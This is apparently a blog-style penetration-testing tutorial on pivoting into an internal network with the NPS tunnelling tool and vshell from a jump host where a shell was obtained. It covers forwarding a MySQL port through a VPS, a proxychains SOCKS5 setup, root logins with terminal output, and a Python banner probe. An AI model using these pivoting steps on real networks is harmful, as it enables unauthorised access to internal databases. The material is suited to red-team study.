NPS: An Intranet Attack/Defense Footprinting Tool

Goal: access someone else's localhost:3306 database from the local machine

Start the NPS server locally. By default it serves a web UI on port 8080 with account admin and password 123; the password can be changed in the conf directory.

After logging in, create a client and copy its connection command.

Paste the command below onto a jump host that belongs to that client.

Run it and refresh: the connection status changes to Ready. Then click Tunnels and create a local port 6666 that maps to the target IP's port 3306, i.e. the database service.

Connect to it and confirm the database is reachable directly.

A node can also be set up later using a Socket.

Goal: build a SOCKS node to reach into the intranet

First install a proxy tool (Linux):

# Debian/Ubuntu
sudo apt-get install proxychains

# CentOS/RHEL
sudo yum install proxychains-ng

On Windows, use Proxifier.

NPS uses SOCKS5 here.

Usage: edit the /etc/proxychains.conf file, comment out the existing example entry and add your own proxy:

socks5  127.0.0.1 1080   # SOCKS5 proxy
# http    127.0.0.1 8080  # HTTP proxy (choose as needed)

Configure it to go through the SOCKS node's own port 9999.

In the NPS settings page set 9999 so that it matches the local side.

Run commands through the proxy, e.g. `proxychains4 curl xx`; do not run them directly.

You can see the intranet is reached successfully; the direct attempt above fails to reach it.

Changing the NPS default password

Edit the nps.conf file and change the default password 123.

Reaching an intranet with no outbound network access by forwarding ports through NPS

Network layout: intranet host 192.168.22.131 is the jump host on which we obtained a shell; 192.168.22.130 is the MySQL server.

The local machine cannot reach the 192.168.22.0 network:

ping 192.168.22.130

正在 Ping 192.168.22.130 具有 32 字节的数据:
请求超时。

First connect NPS exactly as above.

Here the port-forwarding setting is the intranet port we want; NPS automatically uses the current client as the jump host.

Then we log in from the local machine through the VPS to test.

The host that could not be reached before is now reachable through the forward:

mysql -h 116.62.32.64 -P 33306 -u root -proot
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 5.5.5-10.6.7-MariaDB-3 Debian buildd-unstable

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
mysql>
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.12 sec)

mysql>

Testing on the VPS itself: on the VPS you have to use 127.0.0.1, which goes over TCP.

mysql -P 33306 -u root -proot
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[root@iZbp156z1grx9b9s1305p0Z ~]# mysql -h localhost -P 33306 -u root -proot
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[root@iZbp156z1grx9b9s1305p0Z ~]# mysql -h localhost -P 33306 -u root -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
[root@iZbp156z1grx9b9s1305p0Z ~]# mysql -h 127.0.0.1 -P 33306 -u root -proot
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 33
Server version: 10.6.7-MariaDB-3 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.09 sec)

MariaDB [(none)]> 
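The failed attempts with `localhost` above happen because the mysql client treats `localhost` as the local Unix socket, so it connects to whatever local server owns that socket rather than to the NPS-forwarded TCP port. As an added example (not from the original post), the Python below always connects over TCP and reads only the server's initial greeting, so you can confirm which server a forwarded port actually reaches, its version and whether it offers TLS, without sending any credentials; the sample packets are constructed and `probe` is a hypothetical helper name.

```python
import socket

CLIENT_PROTOCOL_41 = 0x0200  # capability bit: 4.1 protocol
CLIENT_SSL = 0x0800          # capability bit: server accepts TLS

def parse_handshake(packet: bytes) -> dict:
    """Parse a MySQL/MariaDB Handshake v10 greeting (4-byte header included)."""
    length = int.from_bytes(packet[:3], "little")
    payload = packet[4:4 + length]
    if length == 0 or len(payload) != length:
        raise ValueError("truncated packet")
    if payload[0] == 0xFF:  # ERR packet instead of a greeting (e.g. host not allowed)
        code = int.from_bytes(payload[1:3], "little")
        raise ValueError(f"server error {code}: {payload[3:].decode(errors='replace')}")
    if payload[0] != 0x0A:
        raise ValueError(f"unsupported protocol version {payload[0]}")
    end = payload.index(b"\x00", 1)  # server version string is NUL-terminated
    version = payload[1:end].decode()
    pos = end + 1
    conn_id = int.from_bytes(payload[pos:pos + 4], "little")
    pos += 4 + 8 + 1  # skip connection id, auth-plugin-data part 1, filler byte
    cap_low = int.from_bytes(payload[pos:pos + 2], "little")
    charset = payload[pos + 2]
    status = int.from_bytes(payload[pos + 3:pos + 5], "little")
    cap_high = int.from_bytes(payload[pos + 5:pos + 7], "little")
    caps = (cap_high << 16) | cap_low
    return {"version": version, "connection_id": conn_id, "charset": charset,
            "status": status, "capabilities": caps,
            "tls_offered": bool(caps & CLIENT_SSL), "mariadb": "MariaDB" in version}

def probe(host: str, port: int, timeout: float = 5.0) -> dict:
    """TCP only (never the Unix socket); read the greeting, then close without authenticating."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        header = sock.recv(4)
        need = int.from_bytes(header[:3], "little")
        body = b""
        while len(body) < need:
            chunk = sock.recv(need - len(body))
            if not chunk:
                break
            body += chunk
    return parse_handshake(header + body)

# Constructed sample greeting, shaped like the banner the forwarded port returned above.
_PAYLOAD = (b"\x0a" + b"5.5.5-10.6.7-MariaDB-3\x00" + (33).to_bytes(4, "little") + b"abcdefgh"
            + b"\x00" + b"\xff\xf7" + b"\x2d" + b"\x02\x00" + b"\xff\x81" + b"\x15"
            + b"\x00" * 10 + b"ijklmnopqrst\x00" + b"mysql_native_password\x00")
SAMPLE_HANDSHAKE = len(_PAYLOAD).to_bytes(3, "little") + b"\x00" + _PAYLOAD
SAMPLE_ERR = b"\x09\x00\x00\x00\xff\x30\x04Denied"  # constructed ERR packet, code 1072
```

Run `probe("127.0.0.1", 33306)` on the VPS to see the forwarded server's banner; a `tls_offered` of False is worth noting, since credentials then cross the NPS tunnel in the clear.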

Setting up port mapping through the VSHELL platform

Forwarding an intranet port through the jump host with vshell

Once the host is online, just forward the port:

C:\Users\22118>mysql -h 127.0.0.1 -P 33066 -u root -p
Enter password: ****
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.5.5-10.6.7-MariaDB-3 Debian buildd-unstable

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)

mysql>

Exposing services on the public internet with port forwarding

Hide the real IP so that only the forwarding server's IP is visible.

Forward port 8084 to the intranet's port 8084, pushing it onto the public internet.
